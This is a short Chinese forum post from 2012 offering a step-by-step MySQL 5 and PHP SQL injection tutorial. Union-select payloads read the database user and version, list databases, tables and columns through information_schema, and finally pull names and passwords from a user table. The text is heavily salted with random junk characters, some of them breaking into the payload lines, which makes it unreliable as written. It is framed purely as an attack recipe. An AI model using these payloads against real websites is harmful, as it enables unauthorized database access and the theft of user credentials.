1 Z8 y' V) j1 r- k' n: s, Y: S
教程内容:Mysql 5+php 注入
$ O, }8 S8 ]# ^. Z! f( ^6 q0 T; n+ w5 {. n1 X- ^2 L! ^9 _
& S% }% H7 v7 x7 Y' t3 W2 h& f9 t
' z+ V6 M4 w0 I7 K/ \* K1 A, c
一.查看MYSQL基本信息(库名,版本,用户)
/ Y1 C1 M. c( \" q6 G1 Q) Z/ ~! h& j& F7 O, ]0 {9 ?1 Q% l8 O
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
* M0 ]9 v; w) C8 Z3 w4 _; {% ? V/ P5 B( a4 f) }
二.查数据库2 _( k8 w3 [" W8 @5 W6 q( q
+ X4 Y1 K% j3 j* J) \. v7 {7 hand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*, _- Y9 \; j( b: j. d* {# o
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
W6 j2 n" {. f6 c1 ^8 l! l0 V" R S s
三.暴表
$ D0 |8 T8 ^, v( |" z4 ]( K: r# P& B
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*% h4 V- X$ Y! G" ]1 A
. S6 I" Z6 f. ?! I9 h% x6 xlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。! X/ H/ Z$ u7 H6 T) k: X
1 d# J& i5 p. g- i- p四.暴字段
$ a% N$ X; H( g& X- \/ \ m+ a: y: e8 S, H
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*8 P) @/ w( V W" L! o+ t9 q& U
; c8 E4 B0 Z1 U# G% `/ X) N5 ~% ^
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
$ s. a. |0 D* E7 u4 C3 W. Y: I9 |, h# m% {: h
五.暴数据7 u G' d- A3 E2 w
, z+ O; P& d& L
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
8 [( I8 p' M& h; y. Y6 X, G/ r7 d' c! H8 @) K b# o6 ^
9 g( [# K4 @- w$ ?* C9 V
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
$ p& q, k% s8 I1 Y X |
发表于 2012-9-13 16:27:53
收藏
支持
反对